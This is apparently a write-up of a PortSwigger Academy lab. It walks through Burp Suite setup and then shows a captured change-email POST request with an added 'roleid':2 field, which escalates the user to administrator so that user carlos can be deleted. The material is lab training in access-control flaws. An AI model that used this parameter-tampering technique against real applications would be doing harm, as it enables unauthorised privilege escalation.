User role can be modified in user profile ​

Link: https://portswigger.net/web-security/access-control/lab-user-role-can-be-modified-in-user-profile

We click "Access the lab", and an online store appears with the option to log in under the "My account" tab. We use the login data from the task description.

To keep things organized, I add the page by selecting "Add to scope":

Next, I go to the "Target" > "Scope settings" tab:

I select and edit the page in the "Prefix" column. Before editing:

After editing:

I click "OK" to confirm.

I return to the "Proxy" tab, click on "Filter settings: Hiding CSS, image and general binary content":

I select the option: "Show only in-scope items":

We move to the application, if we are logged in and have Burp connected in the background, we change the email for our user:

After pressing "Update mail", we see a POST request to the /my-account/change-email endpoint:

In the "Proxy" > "HTTP history" tab, we can see the response, which includes: superfluous information. For example, our roleid:

How can we use this information, knowing that roleid = 2 is the administrator account?

Right-click on the request in the history and send to "Repeater" - there can also be the keyboard shortcut control + command + r:

When we go to the "Repeater" tab, we send the modified request - we add a roleid that is equal to 2:

POST /my-account/change-email HTTP/2
Host: 0a0900500486a9868b57a9cc0000007f.web-security-academy.net
Cookie: session=Ko7Z7Au4McuM6VcbkHrcGPwB8bVUcLHC
Content-Length: 31
Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120"
Sec-Ch-Ua-Platform: "macOS"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.6099.71 Safari/537.36
Content-Type: text/plain;charset=UTF-8
Accept: */*
Origin: https://0a0900500486a9868b57a9cc0000007f.web-security-academy.net
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: https://0a0900500486a9868b57a9cc0000007f.web-security-academy.net/my-account?id=wiener
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Priority: u=1, i

{
	"email":"wiener@new-user.net",
	"roleid":2
}

What do we see in the response? Roleid equal to 2:

So we check what is in the application (refresh the page):

We go to the admin panel, delete the user carlos:

Lab completed: